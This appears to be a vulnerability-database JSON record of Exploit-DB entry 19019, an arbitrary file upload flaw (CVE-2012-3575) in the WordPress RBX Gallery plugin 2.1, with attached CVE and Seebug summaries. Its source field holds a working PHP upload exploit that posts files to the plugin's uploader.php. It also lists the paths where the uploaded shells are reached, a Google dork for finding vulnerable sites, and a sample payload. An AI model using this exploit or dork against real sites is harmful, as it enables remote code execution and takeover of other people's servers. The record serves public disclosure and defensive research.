{"bulletinFamily": "exploit", "id": "EDB-ID:19019", "cvelist": ["CVE-2012-3575"], "modified": "2012-06-08T00:00:00", "lastseen": "2016-02-02T10:53:58", "edition": 1, "sourceData": "##################################################\r\n# Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File \r\nUpload Vulnerability\r\n# Version : 2.1\r\n# Link : http://wordpress.org/extend/plugins/rbxgallery/\r\n# Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip\r\n# Date : 03-06-2012\r\n# Google Dork : inurl:/wp-content/plugins/rbxgallery/\r\n# Author : Sammy FORGIT - sam at opensyscom dot fr - \r\nhttp://www.opensyscom.fr\r\n##################################################\r\n\r\n\r\nExploit :\r\n\r\nPostShell.php\r\n<?php\r\n\r\n$uploadfile=\"lo.php\";\r\n$uploadfile2=\"db.php\";\r\n$ch = \r\ncurl_init(\"http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php\");\r\ncurl_setopt($ch, CURLOPT_POST, true);\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS,\r\n array('images[0]'=>\"@$uploadfile\",\r\n 'images[1]'=>\"@$uploadfile2\",\r\n 'Submit'=>'submit'));\r\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n$postResult = curl_exec($ch);\r\ncurl_close($ch);\r\nprint \"$postResult\";\r\n\r\n?>\r\n\r\nShell Access :\r\nhttp://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php\r\nhttp://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php\r\n\r\nlo.php\r\n<?php\r\nphpinfo();\r\n?>\r\n", "published": "2012-06-08T00:00:00", "href": "https://www.exploit-db.com/exploits/19019/", "osvdbidlist": ["82796"], "reporter": "Sammy FORGIT", "hash": "6b345b9f265578b48cec48f6ecc6fb580dbc84be80fe7205b5c874fb30688252", "title": "WordPress RBX Gallery Plugin 2.1 - Arbitrary File Upload", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Wordpress RBX Gallery Plugin 2.1 - Arbitrary File Upload. CVE-2012-3575. Webapps exploit for php platform", "references": [], "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19019/", "enchantments": {"vulnersScore": 6.5}}

{"result": {"cve": [{"id": "CVE-2012-3575", "type": "cve", "title": "CVE-2012-3575", "description": "Unrestricted file upload vulnerability in uploader.php in the RBX Gallery plugin 2.1 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in uploads/rbxslider.", "published": "2012-06-15T20:55:07", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3575", "cvelist": ["CVE-2012-3575"], "lastseen": "2016-09-03T16:52:16"}], "seebug": [{"id": "SSV-72993", "type": "seebug", "title": "Wordpress RBX Gallery Plugin 2.1 - Arbitrary File Upload", "description": "Summary: \nWordPress is a PHP language development blog platform, users can support PHP and MySQL database server set up your own blog. \nbr/>in WordPress RBX Gallery plugin 2. 1 version of the uploader. php in the presence of unrestricted file upload vulnerability. A remote attacker could exploit the vulnerability by uploading an executable extension files to execute arbitrary code, and then by direct request to the uploads/rbxslider file to access it.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-72993", "cvelist": ["CVE-2012-3575"], "lastseen": "2016-07-27T01:36:31"}]}}